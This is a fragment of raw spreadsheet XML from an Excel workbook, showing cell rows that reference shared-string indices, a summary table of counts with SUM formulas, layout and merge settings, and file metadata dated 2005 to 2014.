      <c r="C65" s="2" t="s">
        <v>152</v>
      </c>
    </row>
    <row r="66" spans="2:3" ht="14.25">
      <c r="B66" t="s">
        <v>189</v>
      </c>
      <c r="C66" s="2" t="s">
        <v>73</v>
      </c>
    </row>
    <row r="67" spans="2:3" ht="14.25">
      <c r="B67" t="s">
        <v>21</v>
      </c>
      <c r="C67" s="2" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="68" spans="2:3" ht="15.75">
      <c r="B68" t="s">
        <v>166</v>
      </c>
      <c r="C68" s="3" t="s">
        <v>74</v>
      </c>
    </row>
    <row r="69" spans="2:3" ht="15.75">
      <c r="B69" t="s">
        <v>136</v>
      </c>
      <c r="C69" s="3" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="70" spans="2:3" ht="15.75">
      <c r="B70" t="s">
        <v>168</v>
      </c>
      <c r="C70" s="3" t="s">
        <v>177</v>
      </c>
    </row>
    <row r="71" spans="2:3" ht="15.75">
      <c r="B71" t="s">
        <v>61</v>
      </c>
      <c r="C71" s="3" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="72" spans="2:3" ht="15.75">
      <c r="B72" t="s">
        <v>25</v>
      </c>
      <c r="C72" s="3" t="s">
        <v>109</v>
      </c>
    </row>
    <row r="73" spans="2:3" ht="15.75">
      <c r="B73" t="s">
        <v>95</v>
      </c>
      <c r="C73" s="3" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="74" spans="2:3" ht="14.25">
      <c r="B74" t="s">
        <v>179</v>
      </c>
      <c r="C74" s="2" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="75" spans="2:3" ht="15.75">
      <c r="B75" t="s">
        <v>84</v>
      </c>
      <c r="C75" s="3" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="76" spans="2:3" ht="15.75">
      <c r="B76" t="s">
        <v>100</v>
      </c>
      <c r="C76" s="3" t="s">
        <v>197</v>
      </c>
    </row>
    <row r="77" spans="2:3" ht="14.25">
      <c r="B77" t="s">
        <v>219</v>
      </c>
      <c r="C77" s="2" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="78" spans="2:3" ht="15.75">
      <c r="B78" t="s">
        <v>125</v>
      </c>
      <c r="C78" s="3" t="s">
        <v>185</v>
      </c>
    </row>
    <row r="79" spans="2:3" ht="15.75">
      <c r="B79" t="s">
        <v>144</v>
      </c>
      <c r="C79" s="3" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="80" spans="2:3" ht="14.25">
      <c r="B80" t="s">
        <v>175</v>
      </c>
      <c r="C80" s="2" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="81" spans="2:3" ht="15.75">
      <c r="B81" t="s">
        <v>149</v>
      </c>
      <c r="C81" s="3" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="82" spans="2:3" ht="14.25">
      <c r="B82" t="s">
        <v>151</v>
      </c>
      <c r="C82" s="2" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="83" ht="14.25">
      <c r="B83" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="84" ht="14.25">
      <c r="B84" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="85" ht="14.25">
      <c r="B85" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="86" ht="14.25">
      <c r="B86" t="s">
        <v>102</v>
      </c>
    </row>
    <row r="87" ht="14.25">
      <c r="B87" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="88" ht="14.25">
      <c r="B88" t="s">
        <v>165</v>
      </c>
    </row>
    <row r="89" ht="14.25">
      <c r="B89" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="90" ht="14.25">
      <c r="B90" t="s">
        <v>190</v>
      </c>
    </row>
    <row r="91" ht="14.25">
      <c r="B91" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="92" ht="14.25">
      <c r="B92" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="93" ht="14.25">
      <c r="B93" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="94" ht="14.25">
      <c r="B94" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="95" ht="14.25">
      <c r="B95" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="96" ht="14.25">
      <c r="B96" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="97" ht="14.25">
      <c r="B97" t="s">
        <v>167</v>
      </c>
    </row>
    <row r="98" ht="14.25">
      <c r="B98" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="99" ht="14.25">
      <c r="B99" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="100" ht="14.25">
      <c r="B100" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="101" ht="14.25">
      <c r="B101" t="s">
        <v>223</v>
      </c>
    </row>
    <row r="102" ht="14.25">
      <c r="B102" t="s">
        <v>214</v>
      </c>
    </row>
    <row r="103" ht="14.25">
      <c r="B103" t="s">
        <v>85</v>
      </c>
    </row>
    <row r="104" ht="14.25">
      <c r="B104" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="105" ht="14.25">
      <c r="B105" t="s">
        <v>157</v>
      </c>
    </row>
    <row r="106" ht="14.25">
      <c r="B106" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="107" ht="14.25">
      <c r="B107" t="s">
        <v>211</v>
      </c>
    </row>
    <row r="108" ht="14.25">
      <c r="B108" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="109" ht="14.25">
      <c r="B109" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="110" ht="14.25">
      <c r="B110" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="111" ht="14.25">
      <c r="B111" t="s">
        <v>75</v>
      </c>
    </row>
    <row r="112" ht="14.25">
      <c r="B112" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="113" ht="14.25">
      <c r="B113" t="s">
        <v>82</v>
      </c>
    </row>
    <row r="114" ht="14.25">
      <c r="B114" t="s">
        <v>246</v>
      </c>
    </row>
    <row r="115" ht="14.25">
      <c r="B115" t="s">
        <v>137</v>
      </c>
    </row>
    <row r="116" ht="14.25">
      <c r="B116" t="s">
        <v>126</v>
      </c>
    </row>
    <row r="117" ht="14.25">
      <c r="B117" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="118" ht="14.25">
      <c r="B118" t="s">
        <v>115</v>
      </c>
    </row>
    <row r="119" ht="14.25">
      <c r="B119" t="s">
        <v>148</v>
      </c>
    </row>
    <row r="120" ht="14.25">
      <c r="B120" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="121" ht="14.25">
      <c r="B121" t="s">
        <v>150</v>
      </c>
    </row>
    <row r="122" ht="14.25">
      <c r="B122" t="s">
        <v>188</v>
      </c>
    </row>
    <row r="123" ht="14.25">
      <c r="B123" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="124" ht="14.25">
      <c r="B124" t="s">
        <v>178</v>
      </c>
    </row>
    <row r="125" ht="14.25">
      <c r="B125" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="126" ht="14.25">
      <c r="B126" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="127" ht="14.25">
      <c r="B127" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="128" ht="14.25">
      <c r="B128" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="129" ht="14.25">
      <c r="B129" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="130" ht="14.25">
      <c r="B130" t="s">
        <v>124</v>
      </c>
    </row>
    <row r="131" ht="14.25">
      <c r="B131" t="s">
        <v>80</v>
      </c>
    </row>
    <row r="132" ht="14.25">
      <c r="B132" t="s">
        <v>92</v>
      </c>
    </row>
    <row r="133" ht="14.25">
      <c r="B133" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="134" ht="14.25">
      <c r="B134" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="135" ht="14.25">
      <c r="B135" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="136" ht="14.25">
      <c r="B136" t="s">
        <v>89</v>
      </c>
    </row>
    <row r="137" ht="14.25">
      <c r="B137" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="138" ht="14.25">
      <c r="B138" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="139" ht="14.25">
      <c r="B139" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="140" ht="14.25">
      <c r="B140" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="141" ht="14.25">
      <c r="B141" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="142" ht="14.25">
      <c r="B142" t="s">
        <v>199</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17"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="I21" sqref="I21"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="23.375" style="4" customWidth="1"/>
    <col min="2" max="2" width="7.875" style="4" customWidth="1"/>
    <col min="3" max="3" width="5.125" style="4" customWidth="1"/>
    <col min="4" max="15" width="4.00390625" style="8" customWidth="1"/>
    <col min="16" max="16" width="6.375" style="8" customWidth="1"/>
    <col min="17" max="17" width="8.00390625" style="8" customWidth="1"/>
    <col min="18" max="18" width="11.125" style="8" customWidth="1"/>
    <col min="19" max="19" width="6.25390625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="14.25">
      <c r="A1" s="4" t="s">
        <v>234</v>
      </c>
    </row>
    <row r="2" spans="1:19" s="1" customFormat="1" ht="26.25" customHeight="1">
      <c r="A2" s="21" t="s">
        <v>244</v>
      </c>
      <c r="B2" s="21"/>
      <c r="C2" s="21"/>
      <c r="D2" s="21"/>
      <c r="E2" s="21"/>
      <c r="F2" s="21"/>
      <c r="G2" s="21"/>
      <c r="H2" s="21"/>
      <c r="I2" s="21"/>
      <c r="J2" s="21"/>
      <c r="K2" s="21"/>
      <c r="L2" s="21"/>
      <c r="M2" s="21"/>
      <c r="N2" s="21"/>
      <c r="O2" s="21"/>
      <c r="P2" s="21"/>
      <c r="Q2" s="21"/>
      <c r="R2" s="21"/>
      <c r="S2" s="21"/>
    </row>
    <row r="3" spans="1:19" s="6" customFormat="1" ht="12.75" customHeight="1">
      <c r="A3" s="22"/>
      <c r="B3" s="22"/>
      <c r="C3" s="22"/>
      <c r="D3" s="22"/>
      <c r="E3" s="22"/>
      <c r="F3" s="22"/>
      <c r="G3" s="22"/>
      <c r="H3" s="22"/>
      <c r="I3" s="22"/>
      <c r="J3" s="22"/>
      <c r="K3" s="22"/>
      <c r="L3" s="22"/>
      <c r="M3" s="22"/>
      <c r="N3" s="22"/>
      <c r="O3" s="22"/>
      <c r="P3" s="13"/>
      <c r="Q3" s="13"/>
      <c r="R3" s="13"/>
      <c r="S3" s="14"/>
    </row>
    <row r="4" spans="1:19" s="5" customFormat="1" ht="24" customHeight="1">
      <c r="A4" s="23" t="s">
        <v>226</v>
      </c>
      <c r="B4" s="23" t="s">
        <v>227</v>
      </c>
      <c r="C4" s="26" t="s">
        <v>245</v>
      </c>
      <c r="D4" s="27"/>
      <c r="E4" s="27"/>
      <c r="F4" s="27"/>
      <c r="G4" s="27"/>
      <c r="H4" s="27"/>
      <c r="I4" s="27"/>
      <c r="J4" s="27"/>
      <c r="K4" s="27"/>
      <c r="L4" s="27"/>
      <c r="M4" s="27"/>
      <c r="N4" s="27"/>
      <c r="O4" s="27"/>
      <c r="P4" s="28" t="s">
        <v>240</v>
      </c>
      <c r="Q4" s="28" t="s">
        <v>235</v>
      </c>
      <c r="R4" s="28" t="s">
        <v>238</v>
      </c>
      <c r="S4" s="25" t="s">
        <v>218</v>
      </c>
    </row>
    <row r="5" spans="1:24" s="5" customFormat="1" ht="45" customHeight="1">
      <c r="A5" s="24"/>
      <c r="B5" s="24"/>
      <c r="C5" s="11" t="s">
        <v>91</v>
      </c>
      <c r="D5" s="12" t="s">
        <v>57</v>
      </c>
      <c r="E5" s="12" t="s">
        <v>58</v>
      </c>
      <c r="F5" s="12" t="s">
        <v>59</v>
      </c>
      <c r="G5" s="12" t="s">
        <v>129</v>
      </c>
      <c r="H5" s="12" t="s">
        <v>130</v>
      </c>
      <c r="I5" s="12" t="s">
        <v>131</v>
      </c>
      <c r="J5" s="12" t="s">
        <v>77</v>
      </c>
      <c r="K5" s="12" t="s">
        <v>132</v>
      </c>
      <c r="L5" s="12" t="s">
        <v>133</v>
      </c>
      <c r="M5" s="12" t="s">
        <v>134</v>
      </c>
      <c r="N5" s="12" t="s">
        <v>198</v>
      </c>
      <c r="O5" s="15" t="s">
        <v>70</v>
      </c>
      <c r="P5" s="29"/>
      <c r="Q5" s="29"/>
      <c r="R5" s="29"/>
      <c r="S5" s="25"/>
      <c r="X5" s="10"/>
    </row>
    <row r="6" spans="1:19" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A6" s="9" t="s">
        <v>228</v>
      </c>
      <c r="B6" s="9" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="9">
        <v>25</v>
      </c>
      <c r="D6" s="9">
        <v>5</v>
      </c>
      <c r="E6" s="9">
        <v>4</v>
      </c>
      <c r="F6" s="9">
        <v>5</v>
      </c>
      <c r="G6" s="9">
        <v>3</v>
      </c>
      <c r="H6" s="9">
        <v>2</v>
      </c>
      <c r="I6" s="9">
        <v>1</v>
      </c>
      <c r="J6" s="9"/>
      <c r="K6" s="9"/>
      <c r="L6" s="9">
        <v>1</v>
      </c>
      <c r="M6" s="9">
        <v>4</v>
      </c>
      <c r="N6" s="9"/>
      <c r="O6" s="9"/>
      <c r="P6" s="18" t="s">
        <v>241</v>
      </c>
      <c r="Q6" s="18" t="s">
        <v>236</v>
      </c>
      <c r="R6" s="18" t="s">
        <v>239</v>
      </c>
      <c r="S6" s="18"/>
    </row>
    <row r="7" spans="1:19" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A7" s="9" t="s">
        <v>229</v>
      </c>
      <c r="B7" s="9" t="s">
        <v>231</v>
      </c>
      <c r="C7" s="9">
        <v>22</v>
      </c>
      <c r="D7" s="9">
        <v>5</v>
      </c>
      <c r="E7" s="9">
        <v>4</v>
      </c>
      <c r="F7" s="9">
        <v>3</v>
      </c>
      <c r="G7" s="9"/>
      <c r="H7" s="9">
        <v>3</v>
      </c>
      <c r="I7" s="9"/>
      <c r="J7" s="9">
        <v>4</v>
      </c>
      <c r="K7" s="9">
        <v>2</v>
      </c>
      <c r="L7" s="9">
        <v>1</v>
      </c>
      <c r="M7" s="9"/>
      <c r="N7" s="9"/>
      <c r="O7" s="9"/>
      <c r="P7" s="19"/>
      <c r="Q7" s="19"/>
      <c r="R7" s="20"/>
      <c r="S7" s="20"/>
    </row>
    <row r="8" spans="1:19" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A8" s="9" t="s">
        <v>230</v>
      </c>
      <c r="B8" s="9" t="s">
        <v>232</v>
      </c>
      <c r="C8" s="9">
        <v>19</v>
      </c>
      <c r="D8" s="9">
        <v>6</v>
      </c>
      <c r="E8" s="9">
        <v>8</v>
      </c>
      <c r="F8" s="9">
        <v>3</v>
      </c>
      <c r="G8" s="9"/>
      <c r="H8" s="9"/>
      <c r="I8" s="9"/>
      <c r="J8" s="9"/>
      <c r="K8" s="9"/>
      <c r="L8" s="9">
        <v>1</v>
      </c>
      <c r="M8" s="9"/>
      <c r="N8" s="9">
        <v>1</v>
      </c>
      <c r="O8" s="9"/>
      <c r="P8" s="18" t="s">
        <v>242</v>
      </c>
      <c r="Q8" s="18" t="s">
        <v>237</v>
      </c>
      <c r="R8" s="20"/>
      <c r="S8" s="20"/>
    </row>
    <row r="9" spans="1:19" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A9" s="9" t="s">
        <v>28</v>
      </c>
      <c r="B9" s="9" t="s">
        <v>4</v>
      </c>
      <c r="C9" s="9">
        <f>D9+E9+F9+G9+H9+I9+J9+K9+L9+M9+N9+O9</f>
        <v>5</v>
      </c>
      <c r="D9" s="9">
        <v>1</v>
      </c>
      <c r="E9" s="9">
        <v>1</v>
      </c>
      <c r="F9" s="9">
        <v>2</v>
      </c>
      <c r="G9" s="9"/>
      <c r="H9" s="9"/>
      <c r="I9" s="9"/>
      <c r="J9" s="9"/>
      <c r="K9" s="9"/>
      <c r="L9" s="9"/>
      <c r="M9" s="9">
        <v>1</v>
      </c>
      <c r="N9" s="9"/>
      <c r="O9" s="9"/>
      <c r="P9" s="19"/>
      <c r="Q9" s="20"/>
      <c r="R9" s="20"/>
      <c r="S9" s="20"/>
    </row>
    <row r="10" spans="1:19" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A10" s="9" t="s">
        <v>6</v>
      </c>
      <c r="B10" s="9" t="s">
        <v>5</v>
      </c>
      <c r="C10" s="9">
        <v>3</v>
      </c>
      <c r="D10" s="9"/>
      <c r="E10" s="9"/>
      <c r="F10" s="9"/>
      <c r="G10" s="9"/>
      <c r="H10" s="9"/>
      <c r="I10" s="9"/>
      <c r="J10" s="9"/>
      <c r="K10" s="9"/>
      <c r="L10" s="9"/>
      <c r="M10" s="9"/>
      <c r="N10" s="9"/>
      <c r="O10" s="9">
        <v>3</v>
      </c>
      <c r="P10" s="18" t="s">
        <v>243</v>
      </c>
      <c r="Q10" s="20"/>
      <c r="R10" s="20"/>
      <c r="S10" s="20"/>
    </row>
    <row r="11" spans="1:19" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A11" s="9" t="s">
        <v>7</v>
      </c>
      <c r="B11" s="9" t="s">
        <v>233</v>
      </c>
      <c r="C11" s="9">
        <v>2</v>
      </c>
      <c r="D11" s="9"/>
      <c r="E11" s="9"/>
      <c r="F11" s="9"/>
      <c r="G11" s="9"/>
      <c r="H11" s="9"/>
      <c r="I11" s="9"/>
      <c r="J11" s="9"/>
      <c r="K11" s="9"/>
      <c r="L11" s="9"/>
      <c r="M11" s="9"/>
      <c r="N11" s="9"/>
      <c r="O11" s="9">
        <v>2</v>
      </c>
      <c r="P11" s="20"/>
      <c r="Q11" s="20"/>
      <c r="R11" s="20"/>
      <c r="S11" s="20"/>
    </row>
    <row r="12" spans="1:19" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A12" s="9" t="s">
        <v>8</v>
      </c>
      <c r="B12" s="9" t="s">
        <v>233</v>
      </c>
      <c r="C12" s="9">
        <v>7</v>
      </c>
      <c r="D12" s="9"/>
      <c r="E12" s="9"/>
      <c r="F12" s="9"/>
      <c r="G12" s="9"/>
      <c r="H12" s="9"/>
      <c r="I12" s="9"/>
      <c r="J12" s="9"/>
      <c r="K12" s="9"/>
      <c r="L12" s="9"/>
      <c r="M12" s="9"/>
      <c r="N12" s="9"/>
      <c r="O12" s="9">
        <v>7</v>
      </c>
      <c r="P12" s="20"/>
      <c r="Q12" s="20"/>
      <c r="R12" s="20"/>
      <c r="S12" s="20"/>
    </row>
    <row r="13" spans="1:19" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A13" s="9" t="s">
        <v>9</v>
      </c>
      <c r="B13" s="9" t="s">
        <v>233</v>
      </c>
      <c r="C13" s="9">
        <v>11</v>
      </c>
      <c r="D13" s="9"/>
      <c r="E13" s="9"/>
      <c r="F13" s="9"/>
      <c r="G13" s="9"/>
      <c r="H13" s="9"/>
      <c r="I13" s="9"/>
      <c r="J13" s="9"/>
      <c r="K13" s="9"/>
      <c r="L13" s="9"/>
      <c r="M13" s="9"/>
      <c r="N13" s="9"/>
      <c r="O13" s="9">
        <v>11</v>
      </c>
      <c r="P13" s="20"/>
      <c r="Q13" s="20"/>
      <c r="R13" s="20"/>
      <c r="S13" s="20"/>
    </row>
    <row r="14" spans="1:19" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A14" s="9" t="s">
        <v>10</v>
      </c>
      <c r="B14" s="9" t="s">
        <v>233</v>
      </c>
      <c r="C14" s="9">
        <v>15</v>
      </c>
      <c r="D14" s="9"/>
      <c r="E14" s="9"/>
      <c r="F14" s="9"/>
      <c r="G14" s="9"/>
      <c r="H14" s="9"/>
      <c r="I14" s="9"/>
      <c r="J14" s="9"/>
      <c r="K14" s="9"/>
      <c r="L14" s="9"/>
      <c r="M14" s="9"/>
      <c r="N14" s="9"/>
      <c r="O14" s="9">
        <v>15</v>
      </c>
      <c r="P14" s="20"/>
      <c r="Q14" s="20"/>
      <c r="R14" s="20"/>
      <c r="S14" s="20"/>
    </row>
    <row r="15" spans="1:19" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A15" s="9" t="s">
        <v>11</v>
      </c>
      <c r="B15" s="9" t="s">
        <v>233</v>
      </c>
      <c r="C15" s="9">
        <v>1</v>
      </c>
      <c r="D15" s="9"/>
      <c r="E15" s="9"/>
      <c r="F15" s="9"/>
      <c r="G15" s="9"/>
      <c r="H15" s="9"/>
      <c r="I15" s="9"/>
      <c r="J15" s="9"/>
      <c r="K15" s="9"/>
      <c r="L15" s="9"/>
      <c r="M15" s="9"/>
      <c r="N15" s="9"/>
      <c r="O15" s="9">
        <v>1</v>
      </c>
      <c r="P15" s="20"/>
      <c r="Q15" s="20"/>
      <c r="R15" s="20"/>
      <c r="S15" s="20"/>
    </row>
    <row r="16" spans="1:19" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A16" s="9" t="s">
        <v>248</v>
      </c>
      <c r="B16" s="9" t="s">
        <v>5</v>
      </c>
      <c r="C16" s="9">
        <v>4</v>
      </c>
      <c r="D16" s="9"/>
      <c r="E16" s="9"/>
      <c r="F16" s="9"/>
      <c r="G16" s="9"/>
      <c r="H16" s="9"/>
      <c r="I16" s="9"/>
      <c r="J16" s="9"/>
      <c r="K16" s="9"/>
      <c r="L16" s="9"/>
      <c r="M16" s="9"/>
      <c r="N16" s="9"/>
      <c r="O16" s="9">
        <v>4</v>
      </c>
      <c r="P16" s="20"/>
      <c r="Q16" s="20"/>
      <c r="R16" s="20"/>
      <c r="S16" s="20"/>
    </row>
    <row r="17" spans="1:19" s="7" customFormat="1" ht="24.75" customHeight="1">
      <c r="A17" s="16" t="s">
        <v>91</v>
      </c>
      <c r="B17" s="17"/>
      <c r="C17" s="9">
        <f aca="true" t="shared" si="0" ref="C17:O17">SUM(C6:C16)</f>
        <v>114</v>
      </c>
      <c r="D17" s="9">
        <f t="shared" si="0"/>
        <v>17</v>
      </c>
      <c r="E17" s="9">
        <f t="shared" si="0"/>
        <v>17</v>
      </c>
      <c r="F17" s="9">
        <f t="shared" si="0"/>
        <v>13</v>
      </c>
      <c r="G17" s="9">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="H17" s="9">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
      <c r="I17" s="9">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="J17" s="9">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="K17" s="9">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="L17" s="9">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="M17" s="9">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
      <c r="N17" s="9">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="O17" s="9">
        <f t="shared" si="0"/>
        <v>43</v>
      </c>
      <c r="P17" s="9"/>
      <c r="Q17" s="9"/>
      <c r="R17" s="9"/>
      <c r="S17" s="9"/>
    </row>
    <row r="18" ht="19.5" customHeight="1"/>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="17">
    <mergeCell ref="A2:S2"/>
    <mergeCell ref="A3:O3"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="S4:S5"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="C4:O4"/>
    <mergeCell ref="Q4:Q5"/>
    <mergeCell ref="P4:P5"/>
    <mergeCell ref="R4:R5"/>
    <mergeCell ref="A17:B17"/>
    <mergeCell ref="P6:P7"/>
    <mergeCell ref="P10:P16"/>
    <mergeCell ref="S6:S16"/>
    <mergeCell ref="Q6:Q7"/>
    <mergeCell ref="Q8:Q16"/>
    <mergeCell ref="R6:R16"/>
    <mergeCell ref="P8:P9"/>
  </mergeCells>
  <printOptions/>
  <pageMargins left="1.01" right="0.39" top="1.01" bottom="0.59"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微软用户</cp:lastModifiedBy>
  <cp:lastPrinted>2014-08-12T09:18:45Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2005-11-10T11:17:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-08-12T09:19:02Z</dcterms:modified>
  <cp:category/>
  <cp:version/>
  <cp:contentType/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>